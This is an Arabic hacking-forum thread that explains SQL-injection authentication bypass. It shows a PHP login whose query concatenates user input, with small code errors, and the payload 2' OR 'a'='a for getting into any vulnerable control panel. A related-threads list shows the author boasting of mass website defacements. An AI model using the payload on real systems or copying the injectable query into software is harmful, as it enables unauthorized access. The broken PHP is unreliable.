[ Hidden Pain ] شرح ثغرات Auth Bypass

[ Hidden Pain ] شرح ثغرات Auth Bypass


النتائج 1 إلى 8 من 8

الموضوع: [ Hidden Pain ] شرح ثغرات Auth Bypass

  1. #1
    هكر مجتهد الصورة الرمزية Hidden pain
    تاريخ التسجيل
    May 2010
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    592

    Smile [ Hidden Pain ] شرح ثغرات Auth Bypass

    السلام عليكم

    تعتبر ثغرات Auth Bypass من الثغرات الشائعة جدا
    و هي نوع من انواع حقن ال SQL
    و للذين لا يعرفونه هو يسمح لك بالدخول على عضوية او لوحة تحكم مصابة به

    فكرتها بسيطة جدا فقط تحتاج معرفة صغيرة في ال PHP و في ال SQL

    نبدأ على بركة الله

    كود PHP:
    <?php
    echo '<form method="post">
        your name : <input name="username" style="width: 205px" type="text" /><br />your pass : <input name="password" style="width: 205px" type="text" />
        <br />
        <input name="ok" type="submit" value="ok" /></form>
    '
    ;

    if (
    $_POST['ok']){ 

    $sql "SELECT * FROM users WHERE username='" $_POST['username'] . "' AND
    password='" 
    $POST_['password'] . "'";
    response mysql_query($sql);
    }

    ?>
    هذا كود نضام دخول بسيط
    طبعا بعد ارفاق الملف الذي يسجل الدخول على اعدة البيانات
    رح يقوم هاذا الكود او ال query بالأصح بمقارنة البيانات المطلوبة بالبيانات في القاعدة

    طبعا تطابق البيانات هو ما يسمح لنا بسجيل الدخول على أي شيئ لوحة تحكم عضوية في منتدى أي شيئ فيه نضام دخول عموما

    أخذ ال query و نحلله

    كود PHP:
    $sql "SELECT * FROM users WHERE username='" $_POST['username'] . "' AND
    password='" 
    $POST_['password'] . "'"
    لو تلاحضون هنا يتأكد من الاسم يدخل الاسم المراد التأكد منه

    كود PHP:
    username='" . $_POST['username'] . "' 
    يعني لو تحط الاسم hidden pain
    رح تصير هكذا

    كود PHP:
    username='hidden pain' 
    تمام

    و هاذا للتحق من الباس

    كود PHP:
    password='" . $POST_['password'] . "' 
    و لو ندخل الباس 123456 رح يصير كذا

    كود PHP:
    password='123456' 
    كذا ارجو انكم فهمتم جزء ال php

    ندخل على السيكول

    نستبدل اي بيانات نريدها بهاذا الكود رح نشرحه
    كود PHP:
    2' OR 'a'='
    مثلا ر اجربه ف الباس و رح تصبح ذا
    كود PHP:
    password='2' OR 'a'='a' 
    شوفو الحيلة هنا رح يشوف الباس لو كانت 2 رح يسجل الدخول عادي
    و لو ما كانت 2 رح ينتقل للشرط اللي اضفناه 'OR 'a'='a

    و طبعا الشرط متحقق لأن ال string
    a = a
    و هكدا تم الدخول تمام

    و نفس الحيلة للاسم

    و هنا السلام عليكم و رحمة الله تعالى و بركاته


  2. #2

    افتراضي رد: [ Hidden Pain ] شرح ثغرات Auth Bypass

    بارك الله فيك اخي على الشرح استمر

    Iam BACK PEOPLE

    Ace 2010-2017

  3. #3
    هكر مجتهد الصورة الرمزية Hidden pain
    تاريخ التسجيل
    May 2010
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    592

    افتراضي رد: [ Hidden Pain ] شرح ثغرات Auth Bypass

    مشكور أخي على مرورك الجميل
    بارك الله فيك


  4. #4

    افتراضي رد: [ Hidden Pain ] شرح ثغرات Auth Bypass

    مشكورررررررررررررر

  5. #5

    افتراضي رد: [ Hidden Pain ] شرح ثغرات Auth Bypass

    مشكورررررررررررررر يا غالي

  6. #6
    هكر مجتهد الصورة الرمزية Hidden pain
    تاريخ التسجيل
    May 2010
    الدولة
    بلد المليون و نصف المليون شهيد
    المشاركات
    592

    افتراضي رد: [ Hidden Pain ] شرح ثغرات Auth Bypass

    اقتباس المشاركة الأصلية كتبت بواسطة aromapc مشاهدة المشاركة
    مشكورررررررررررررر يا غالي
    لا شكر على واجب أخي الكريم
    في الخدمة


  7. #7

    افتراضي رد: [ Hidden Pain ] شرح ثغرات Auth Bypass

    شرح ممتاز واصل الابداع

  8. #8

    افتراضي رد: [ Hidden Pain ] شرح ثغرات Auth Bypass

    مشكوووووووووووووووووووووو وووووووور
    اللهم انت ربي ... لا اله الا انت خلقتني.. وانا عبدك وانا على عهدك.. و وعدك ما استطعت اعوذ بك من شر ما صنعت.. ابوء لك بنعمتك علي .. وابوء لك بذنبي.. فاغفرلي يا رب.. فأنه لا يغفر الذنوب الا انت.

المواضيع المتشابهه

  1. [ Hidden Pain ] دعس 735 موقع --
    بواسطة Hidden pain في المنتدى معرض الانجازات
    مشاركات: 11
    آخر مشاركة: 04-16-2011, 08:14 PM
  2. [Hidden Pain] دعس نصف سرفر --
    بواسطة Hidden pain في المنتدى معرض الانجازات
    مشاركات: 12
    آخر مشاركة: 03-02-2011, 11:43 PM
  3. [Hidden Pain] تم دعس 80 موقع --
    بواسطة Hidden pain في المنتدى معرض الانجازات
    مشاركات: 12
    آخر مشاركة: 02-11-2011, 11:37 PM
  4. [Hidden Pain] دعس 3 إذاعات أوروبية --
    بواسطة Hidden pain في المنتدى معرض الانجازات
    مشاركات: 4
    آخر مشاركة: 01-08-2011, 03:30 PM
  5. شرح ثغرات Auth Bypass
    بواسطة AtT4CKxT3rR0r1ST في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 01-31-2010, 02:07 PM

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •